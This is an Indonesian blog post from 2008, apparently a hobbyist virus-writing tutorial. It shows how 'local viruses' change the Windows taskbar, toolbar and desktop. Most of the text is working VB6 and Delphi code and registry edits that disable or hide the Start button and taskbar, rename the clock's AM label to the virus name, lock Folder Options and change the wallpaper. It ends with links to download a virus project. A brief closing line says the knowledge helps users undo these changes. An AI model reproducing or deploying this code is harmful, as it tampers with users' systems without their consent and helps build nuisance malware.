Tuesday, November 18, 2008

VIRUS UBAH TAMPILAN TASKBAR,TOOLBAR & DEKSTOP

Saat ini banyak bermunculan virus-virus local dengan berbagaimacam bahasa dan berbagai macam ulahnya saat mengacak-acak registry tapi kebanyakan dari virus-virus local tersebut akan merubah bagian Taskbar,Toolbar dan Dekstop.

Dari Tampilan Taskbar ulah virus salah satunya adalah:

1.membuat start menu hilang fungsi


virus ini terdiri dari 1 form,code:

Option Explicit

'Fungsi Win32 Api yang digunakan

Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long


Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

Private Declare Function Putfocus Lib "user32" Alias "SetFocus" (ByVal hwnd As Long) As LongPrivate Declare Function SetParent Lib "user32" (ByVal hWndChild As Long, ByVal hWndNewParent As Long) As Long

Private Declare Function LockWindowUpdate Lib "user32" (ByVal hwndLock As Long) As Long


Private Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long


Private Declare Function WindowFromPoint Lib "user32" (ByVal xPoint As Long, ByVal yPoint As Long) As Long


Private Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long


Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long


Private Declare Function GetWindowPlacement Lib "user32" (ByVal hwnd As Long, lpwndpl As WINDOWPLACEMENT) As Long


'Konstanta yang digunakan pada Fungsi Win32 API


Private Const HWND_NOTOPMOST = -2


Private Const HWND_TOPMOST = -1


'Tipe yang digunakan pada fungsi Win32 API


Private Type POINTAPI


x As Long


y As Long


End Type


Private Type RECT


Left As Long


Top As Long


Right As Long


Bottom As Long


End Type


Private Type WINDOWPLACEMENT


Length As Long


flags As Long


showCmd As Long


ptMinPosition As POINTAPI


ptMaxPosition As POINTAPI


rcNormalPosition As RECT


End Type


Dim hand1 As Long


Dim hand2 As Long


Dim sz As WINDOWPLACEMENT


Private Sub Form_Load()


hand1 = FindWindow("Shell_TrayWnd", vbNullString)


hand2 = FindWindowEx(hand1, 0&, "Button", vbNullString)


GetWindowPlacement hand2, sz


SetParent hand2, 0


Putfocus hand2


SetWindowPos hand2, HWND_TOPMOST, 0, ((Screen.Height / Screen.TwipsPerPixelY) - (sz.rcNormalPosition.Bottom - sz.rcNormalPosition.Top)) + 1, (sz.rcNormalPosition.Right - sz.rcNormalPosition.Left), (sz.rcNormalPosition.Bottom - sz.rcNormalPosition.Top), 0


LockWindowUpdate False


End Sub


‘by:rieysha


‘-------------------end cut-------------------------





2. Menghilangkan start menu



Buka delphi7 klik2x dalam form lalu tulis:


ShowWindow(GetWindow(FindWindow('Shell_traywnd', NiL), 5), 0);


Lalu klik Run(F9).



3. Menghilangkan Taskbar



Buka delphi7 klik2x dalam form lalu tulis:


var


hTaskBar :Thandle;


begin


hTaskBar := FindWindow('Shell_TrayWnd',Nil); ShowWindow(hTaskBar,Sw_Hide);


Lalu klik Run(F9)



4. merubah tampilan jam menjadi nama dari virus tersebut.



Jika di Delphi tulis:


Reg.RootKey := HKEY_CURRENT_USER;


Reg.OpenKey('\Control Panel\International',true);


Reg.WriteString('s1159','rieysha');


Di VisualBasic6.0:


cek = AmbilString(HKCU, "Control Panel\International\s1159", "rieysha")


If cek = "" Then


BuatString HKCU, "Control Panel\International", "s1159", "rieysha"


End If ‘ s1159=AM , s2359=PM



5. mengunci Folder Options pada tool di Toolbar


Caranya sama seperti yang diatas hanya yang dirubah adalah bagian: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer dengan membuat Dword baru bernama: BackBitmap dengan nilai: 1



6. mengubah Tampilan toolbar menjadi bergambar


Caranya sama seperti yang diatas hanya yang dirubah adalah bagian: Software\Microsoft\Internet Explorer\Toolbar baik HKCU ataupun HKLM-nya dengan membuat string baru bernama: BackBitmap dengan nilai: C:\WINDOWS\ Greenstone.bmp



7. Merubah gambar pada desktop


Di Delphi tinggal men set registry:


Reg.RootKey := HKEY_CURRENT_USER;


Reg.OpenKey('\Control Panel\Desktop',true);


Reg.WriteString('Wallpaper','C:\Windows\Blue Rivets.bmp');


Reg.Free;


SystemParametersInfo(SPI_SetDeskWallpaper,0,nil,SPIF_SENDWININICHANGE);


//menset background desktop menjadi Blue Rivets.bmp


Atau biasanya virus local akan menset background desktop menjadi gambar virus tersebut. Gambar tersebut sebenarnya berada dalam tubuh virus yang akan dikeluarkan pada saat virus dijalankan.



Mungkin segitu dulu yang bisa aku jelasin tentang ulah yang biasa dilakukan virus-virus lokal semoga dengan mengetahui bagian-bagian registry mana yang dirubah oleh virus anda juga bisa mengembalikan registery tersebut ke dalam keadaan semula.

download tutorial
http://www.4shared.com/file/69104541/5393bdaa/VIRUSubahTAMPILAN.html

download project
http://www.4shared.com/file/69106944/80ea78ca/ProjectVirusUbahTampilan.html


By:rieysha

| Free Bussines? |

Diposkan oleh beheppy di 4:09 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)